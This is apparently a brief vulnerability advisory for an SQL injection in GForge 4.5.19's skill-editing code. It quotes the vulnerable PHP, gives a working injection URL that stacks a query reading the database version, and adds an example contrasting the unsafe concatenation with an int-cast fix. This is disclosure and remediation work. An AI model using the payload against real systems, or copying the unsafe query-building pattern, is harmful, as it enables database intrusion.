Details
Exploitation requires being logged in with any kind of account.
The vulnerable function is handle_multi_edit($skill_ids) in
/www/people/skills_utils.php:
    $SQL = "select * from skills_data where skills_data_id in(".$skill_ids[0];
    for($i = 1; $i < $numSkills; $i++) {
        $SQL .= ", ".$skill_ids[$i];
    }
    $SQL .= ")";
    $result=db_query($SQL);
Vulnerable URL:
http://gforge.org/people/editprofile.php?skill_edit[]=1)%3Bselect+1%2C2%2C3%2Cversion()+as+title%2C5%2C6%3B+--+&MultiEdit=Edit
Affected version
4.5.19 (.. 4.6 maybe?)
Fix
Cast each skill ID to int before concatenating it into the query.
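The concatenation shown under Details next to the int-cast fix, as an added example that is not GForge's own code. The function names are hypothetical, and the sample input is constructed from the decoded skill_edit[] value in the URL above.

```php
<?php
// Added example, not GForge's own code. Function names are hypothetical.

// Mirrors the concatenation in handle_multi_edit(): each value goes into
// the SQL text unchanged, so anything after the first ")" becomes SQL.
function build_skill_query_vulnerable(array $skill_ids): string
{
    return "select * from skills_data where skills_data_id in("
        . implode(", ", $skill_ids) . ")";
}

// The fix the advisory names: cast every element to int before concatenating.
function build_skill_query_fixed(array $skill_ids): ?string
{
    $ids = [];
    foreach ($skill_ids as $id) {
        // Nested arrays (skill_edit[][]=x) are not IDs; skip them
        // instead of casting them.
        if (!is_scalar($id)) {
            continue;
        }
        // The int cast keeps only a leading integer; any text after it
        // is discarded, and non-numeric input becomes 0.
        $ids[] = (int) $id;
    }
    if ($ids === []) {
        return null; // nothing to look up; avoids emitting "in()"
    }
    return "select * from skills_data where skills_data_id in("
        . implode(", ", $ids) . ")";
}

// Constructed input: the decoded skill_edit[] value from the URL above,
// followed by an ordinary ID.
$skill_edit = ["1);select 1,2,3,version() as title,5,6; -- ", "7"];

echo build_skill_query_vulnerable($skill_edit), "\n";
echo build_skill_query_fixed($skill_edit), "\n";
```

A null return means no usable ID was submitted, so the caller should skip db_query() entirely.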